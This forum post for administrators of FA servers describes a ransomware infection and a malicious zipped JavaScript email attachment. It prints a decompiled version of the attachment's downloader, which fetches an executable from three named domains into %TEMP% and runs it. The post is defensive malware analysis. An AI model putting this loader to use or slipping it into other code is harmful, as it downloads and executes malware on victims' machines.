Malware and Ransomware - Protect FA Servers

This post is intended for SysAdmins who are responsible for the security of their (FA) installations and / or monitoring their users devices and activity for vulnerabilities.

An analysis of a WinXP machine revealed that on uninstallation of an Adware "Junior Icon Editor" resulted in the installation and execution of a Ransomware virus. On rebooting into safe mode, the virus had already encrypted a host of files with a txt, doc, zip png, jpg, extensions renaiming them to an additional extension of .ccc and was readying itself to create system wide havoc by auto starting itself on reboot. Recovery is impossible if we are to believe their threat dropped into practically every folder on the C Drive as html and txt files as the data are purported to be encryped using a RSA 2048 bit cypher.

A recent article on the proliferation of Ransomware in Linux servers raised the bar on datacenter protective security measures. Good business for "Cyber ecurity Consultants" indeed. Universities are joining the bandwagon in providning lucrative courses in this domain despite not having any skills in this regard!

An email file attachment received was a zipped js file. A Payload Security online scan of the attachment revealed no threat. The js code was split up and put into obfuscated variables and made into functions that return their snippet and listed in a randomised manner and then concatenated into obtaining the actual payload which is then eval-ed. A semi-automated decompilation and tidying up resulted in the following:

// Start of Decompile
// cryptographic machine GUID, ability to lookup the windows account name, Reads the active computer name
var str="5552505E05140911100C11241117054A0A01105E3C5E070D100D1E010A4A070B094A0C0F5E17555E555050535654565055575E55";

// var b = "samiragallery.com lincolnracing.com alejandrosanchezvejar.com".split(" ");

var b[0] = "samiragallery.com";
var b[1] = "lincolnracing.com";
var b[2] = "alejandrosanchezvejar.com";

var ws= WScript.CreateObject("WScript.Shell"); 
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"998317"; 
var xo = WScript.CreateObject("MSXML2.XMLHTTP"); 
var xa = WScript.CreateObject("ADODB.Stream"); 
var ld = 0; 
for (var n=1; n<=3; n++) { 
    for (var i=ld; i<b.length; i++) { 
        var dn = 0; 
        try { 
            xo.open("GET","http://"+b[i]+"/counter/?id="+str+"&rnd=26181"+n, false); xo.send(); 
            if (xo.status == 200) { 
                xa.open(); 
                xa.type = 1; 
                xa.write(xo.responseBody); 
                if (xa.size > 1000) { 
                    dn = 1; 
                    xa.position = 0; 
                    xa.saveToFile(fn+n+".exe",2); 
                    try { 
                        ws.Run(fn+n+".exe",1,0); 
                    } catch (er) { }; 
                }; 
                xa.close(); 
            }; 
            if (dn == 1) { 
                ld = i; 
                break; 
            }; 
        } catch (er) { }; 
    }; 
};

//         function b3(){return eval;};
//         b3()(v6);
// commented out for safety
// eval(v6);

// End of Decompile

On executing the xo.open GET url of the 3 sites listed in the code above, a malicious binary is streamed into the system and then renamed as an exe file - the linux variation isn't hard to fathom.

The first malicious site in the code is listed as a privacy enabled domain in GoDaddy.com. Securi Site Check lists it as "Infected".  Virus-Total lists the last few accesses that show the same url template listed in the code herein.

Standard Operating Procedures of Criminal conglomerates, geeky script kiddies, "Rogue" nations security apparatus, "Penetration testing" masquerades, ...... highest bidder ...... monopolisers...... Security / Anti-Virus corporates.....